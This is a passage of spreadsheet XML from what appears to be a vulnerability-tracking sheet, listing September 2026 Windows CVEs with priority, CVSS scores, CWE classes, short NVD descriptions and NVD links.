          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69426</t>
        </is>
      </c>
      <c r="C793" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D793" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E793" s="5" t="inlineStr"/>
      <c r="F793" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G793" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H793" s="5" t="inlineStr"/>
      <c r="I793" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J793" s="5" t="inlineStr"/>
      <c r="K793" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L793" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows VOLSNAP.SYS allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69426</t>
        </is>
      </c>
    </row>
    <row r="794">
      <c r="A794" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69433</t>
        </is>
      </c>
      <c r="C794" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D794" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E794" s="5" t="inlineStr"/>
      <c r="F794" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G794" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H794" s="5" t="inlineStr"/>
      <c r="I794" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J794" s="5" t="inlineStr"/>
      <c r="K794" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L794" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69433</t>
        </is>
      </c>
    </row>
    <row r="795">
      <c r="A795" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69436</t>
        </is>
      </c>
      <c r="C795" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D795" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E795" s="5" t="inlineStr"/>
      <c r="F795" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G795" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H795" s="5" t="inlineStr"/>
      <c r="I795" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J795" s="5" t="inlineStr"/>
      <c r="K795" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L795" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69436</t>
        </is>
      </c>
    </row>
    <row r="796">
      <c r="A796" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69444</t>
        </is>
      </c>
      <c r="C796" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D796" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E796" s="5" t="inlineStr"/>
      <c r="F796" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G796" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H796" s="5" t="inlineStr"/>
      <c r="I796" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J796" s="5" t="inlineStr"/>
      <c r="K796" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L796" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69444</t>
        </is>
      </c>
    </row>
    <row r="797">
      <c r="A797" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69445</t>
        </is>
      </c>
      <c r="C797" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D797" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E797" s="5" t="inlineStr"/>
      <c r="F797" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G797" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H797" s="5" t="inlineStr"/>
      <c r="I797" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J797" s="5" t="inlineStr"/>
      <c r="K797" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L797" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows Compressed Folder allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69445</t>
        </is>
      </c>
    </row>
    <row r="798">
      <c r="A798" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69447</t>
        </is>
      </c>
      <c r="C798" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D798" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E798" s="5" t="inlineStr"/>
      <c r="F798" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G798" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H798" s="5" t="inlineStr"/>
      <c r="I798" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J798" s="5" t="inlineStr"/>
      <c r="K798" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L798" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69447</t>
        </is>
      </c>
    </row>
    <row r="799">
      <c r="A799" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69450</t>
        </is>
      </c>
      <c r="C799" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D799" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E799" s="5" t="inlineStr"/>
      <c r="F799" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G799" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H799" s="5" t="inlineStr"/>
      <c r="I799" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J799" s="5" t="inlineStr"/>
      <c r="K799" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L799" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69450</t>
        </is>
      </c>
    </row>
    <row r="800">
      <c r="A800" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69455</t>
        </is>
      </c>
      <c r="C800" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D800" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E800" s="5" t="inlineStr"/>
      <c r="F800" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G800" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H800" s="5" t="inlineStr"/>
      <c r="I800" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J800" s="5" t="inlineStr"/>
      <c r="K800" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L800" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69455</t>
        </is>
      </c>
    </row>
    <row r="801">
      <c r="A801" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69456</t>
        </is>
      </c>
      <c r="C801" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D801" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E801" s="5" t="inlineStr"/>
      <c r="F801" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G801" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H801" s="5" t="inlineStr"/>
      <c r="I801" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J801" s="5" t="inlineStr"/>
      <c r="K801" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L801" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Speech allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69456</t>
        </is>
      </c>
    </row>
    <row r="802">
      <c r="A802" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69459</t>
        </is>
      </c>
      <c r="C802" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D802" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E802" s="5" t="inlineStr"/>
      <c r="F802" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G802" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H802" s="5" t="inlineStr"/>
      <c r="I802" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J802" s="5" t="inlineStr"/>
      <c r="K802" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L802" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Power Dependency Coordinator allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69459</t>
        </is>
      </c>
    </row>
    <row r="803">
      <c r="A803" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69467</t>
        </is>
      </c>
      <c r="C803" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D803" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E803" s="5" t="inlineStr"/>
      <c r="F803" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G803" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H803" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="I803" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J803" s="5" t="inlineStr"/>
      <c r="K803" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L803" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69467</t>
        </is>
      </c>
    </row>
    <row r="804">
      <c r="A804" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69475</t>
        </is>
      </c>
      <c r="C804" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D804" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E804" s="5" t="inlineStr"/>
      <c r="F804" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G804" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H804" s="5" t="inlineStr"/>
      <c r="I804" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J804" s="5" t="inlineStr"/>
      <c r="K804" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L804" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69475</t>
        </is>
      </c>
    </row>
    <row r="805">
      <c r="A805" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69476</t>
        </is>
      </c>
      <c r="C805" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D805" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E805" s="5" t="inlineStr"/>
      <c r="F805" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G805" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H805" s="5" t="inlineStr"/>
      <c r="I805" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J805" s="5" t="inlineStr"/>
      <c r="K805" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L805" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69476</t>
        </is>
      </c>
    </row>
    <row r="806">
      <c r="A806" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69478</t>
        </is>
      </c>
      <c r="C806" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D806" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E806" s="5" t="inlineStr"/>
      <c r="F806" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G806" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H806" s="5" t="inlineStr"/>
      <c r="I806" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J806" s="5" t="inlineStr"/>
      <c r="K806" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L806" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69478</t>
        </is>
      </c>
    </row>
    <row r="807">
      <c r="A807" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69480</t>
        </is>
      </c>
      <c r="C807" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D807" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E807" s="5" t="inlineStr"/>
      <c r="F807" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G807" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H807" s="5" t="inlineStr"/>
      <c r="I807" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J807" s="5" t="inlineStr"/>
      <c r="K807" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L807" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69480</t>
        </is>
      </c>
    </row>
    <row r="808">
      <c r="A808" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69489</t>
        </is>
      </c>
      <c r="C808" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D808" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E808" s="5" t="inlineStr"/>
      <c r="F808" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G808" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H808" s="5" t="inlineStr"/>
      <c r="I808" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J808" s="5" t="inlineStr"/>
      <c r="K808" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L808" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69489</t>
        </is>
      </c>
    </row>
    <row r="809">
      <c r="A809" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69508</t>
        </is>
      </c>
      <c r="C809" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D809" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E809" s="5" t="inlineStr"/>
      <c r="F809" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G809" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H809" s="5" t="inlineStr"/>
      <c r="I809" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J809" s="5" t="inlineStr"/>
      <c r="K809" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L809" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69508</t>
        </is>
      </c>
    </row>
    <row r="810">
      <c r="A810" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69509</t>
        </is>
      </c>
      <c r="C810" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D810" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E810" s="5" t="inlineStr"/>
      <c r="F810" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G810" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H810" s="5" t="inlineStr"/>
      <c r="I810" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J810" s="5" t="inlineStr"/>
      <c r="K810" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L810" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69509</t>
        </is>
      </c>
    </row>
    <row r="811">
      <c r="A811" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69513</t>
        </is>
      </c>
      <c r="C811" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D811" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E811" s="5" t="inlineStr"/>
      <c r="F811" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G811" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H811" s="5" t="inlineStr"/>
      <c r="I811" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J811" s="5" t="inlineStr"/>
      <c r="K811" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L811" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69513</t>
        </is>
      </c>
    </row>
    <row r="812">
      <c r="A812" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69528</t>
        </is>
      </c>
      <c r="C812" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D812" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E812" s="5" t="inlineStr"/>
      <c r="F812" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G812" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H812" s="5" t="inlineStr"/>
      <c r="I812" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J812" s="5" t="inlineStr"/>
      <c r="K812" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L812" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69528</t>
        </is>
      </c>
    </row>
    <row r="813">
      <c r="A813" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69532</t>
        </is>
      </c>
      <c r="C813" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D813" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E813" s="5" t="inlineStr"/>
      <c r="F813" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G813" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H813" s="5" t="inlineStr"/>
      <c r="I813" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J813" s="5" t="inlineStr"/>
      <c r="K813" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L813" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69532</t>
        </is>
      </c>
    </row>
    <row r="814">
      <c r="A814" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69534</t>
        </is>
      </c>
      <c r="C814" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D814" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E814" s="5" t="inlineStr"/>
      <c r="F814" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G814" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H814" s="5" t="inlineStr"/>
      <c r="I814" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J814" s="5" t="inlineStr"/>
      <c r="K814" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L814" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69534</t>
        </is>
      </c>
    </row>
    <row r="815">
      <c r="A815" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69535</t>
        </is>
      </c>
      <c r="C815" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D815" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E815" s="5" t="inlineStr"/>
      <c r="F815" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G815" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H815" s="5" t="inlineStr"/>
      <c r="I815" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J815" s="5" t="inlineStr"/>
      <c r="K815" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="L815" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69535</t>
        </is>
      </c>
    </row>
    <row r="816">
      <c r="A816" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B816" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69538</t>
        </is>
      </c>
      <c r="C816" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D816" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E816" s="5" t="inlineStr"/>
      <c r="F816" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G816" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H816" s="5" t="inlineStr"/>
      <c r="I816" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J816" s="5" t="inlineStr"/>
      <c r="K816" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L816" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69538</t>
        </is>
      </c>
    </row>
    <row r="817">
      <c r="A817" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B817" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69542</t>
        </is>
      </c>
      <c r="C817" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D817" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E817" s="5" t="inlineStr"/>
      <c r="F817" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G817" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H817" s="5" t="inlineStr"/>
      <c r="I817" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J817" s="5" t="inlineStr"/>
      <c r="K817" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
